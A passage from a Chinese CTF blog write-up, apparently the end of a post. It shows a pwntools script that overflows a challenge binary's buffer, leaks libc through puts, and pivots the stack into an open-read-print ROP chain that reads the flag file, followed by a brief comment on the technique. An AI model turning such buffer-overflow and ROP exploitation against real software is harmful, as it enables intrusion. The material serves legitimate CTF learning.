<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = process(<span class="string">&quot;./bs&quot;</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./bs&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;libc-2.23.so&quot;</span>)</span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line"></span><br><span class="line">put_plt = <span class="number">0x4007E0</span></span><br><span class="line">rdi = <span class="number">0x400b93</span></span><br><span class="line">got = <span class="number">0x601058</span></span><br><span class="line"></span><br><span class="line">bss = elf.bss() - <span class="number">0x8</span> + <span class="number">0x30</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;elf.bss(): &#x27;</span>,<span class="built_in">hex</span>(elf.bss()))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;============================&gt;&quot;</span>,<span class="built_in">hex</span>(bss))</span><br><span class="line">payload = <span class="string">b&quot;A&quot;</span>*<span class="number">0x140</span> + p64(got +<span class="number">0x140</span>) + p64(<span class="number">0x400ACC</span>)</span><br><span class="line"></span><br><span class="line">gdb.attach(io,<span class="string">&quot;b *0x400B09&quot;</span>)</span><br><span class="line">pause()</span><br><span class="line"></span><br><span class="line">io.sendafter(<span class="string">&quot;please enter your content:&quot;</span>,payload)</span><br><span class="line"></span><br><span class="line">io.sendafter(<span class="string">&quot;please enter your content again:&quot;</span>,<span class="string">b&quot;AAA&quot;</span>)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&quot;\n&quot;</span>)</span><br><span class="line">libcbase = u64(io.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&quot;\x00&quot;</span>)) </span><br><span class="line">libcbase=libcbase-libc.sym[<span class="string">&quot;__libc_start_main&quot;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;libcbse=================================================+&gt;&quot;</span>,<span class="built_in">hex</span>(libcbase))</span><br><span class="line"></span><br><span class="line">open_addr = libcbase + libc.sym[<span class="string">&quot;open&quot;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;open_addr: &#x27;</span>,<span class="built_in">hex</span>(open_addr))</span><br><span class="line">read_addr = <span class="number">0x400830</span></span><br><span class="line">printf = <span class="number">0x400810</span></span><br><span class="line">leave = <span class="number">0x400B09</span></span><br><span class="line">rdx = <span class="number">0x1b92</span> + libcbase</span><br><span class="line">rsi = libcbase + <span class="number">0x00000000000202f8</span></span><br><span class="line"></span><br><span class="line">payload = p64(rdi) + p64(got + <span class="number">0x78</span> + <span class="number">0x10</span>) + p64(rsi) + p64(<span class="number">0x0</span>)</span><br><span class="line">payload+=p64(rdx) + p64(<span class="number">0x0</span>) + p64(open_addr)</span><br><span class="line"></span><br><span class="line">payload += p64(rdi) + p64(<span class="number">0x3</span>) + p64(rsi) + p64(bss + <span class="number">0x200</span>) + p64(rdx) + p64(<span class="number">0x30</span>) + p64(read_addr) + p64(rdi) + p64(bss+<span class="number">0x200</span>)</span><br><span class="line"></span><br><span class="line">payload += p64(put_plt) + <span class="string">b&quot;flag\x00&quot;</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x140</span>,<span class="string">b&quot;A&quot;</span>) </span><br><span class="line">payload += p64(got - <span class="number">0x8</span>) + p64(leave) </span><br><span class="line">io.sendafter(<span class="string">&quot;please enter your content again:&quot;</span>,payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>这样便是完整的payload，很明显学长的这个比我的要少了很多，而这个的关键就在与对ebp的使用，从一开始溢出将其覆盖之后，后面便一直在利用这个被覆盖的ebp完成libc的暴露与orw的迁移。</p>

    </div>
    
    
    
    
    
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2024 纲的blog
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;wgiegie
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    




    
</body>
</html>
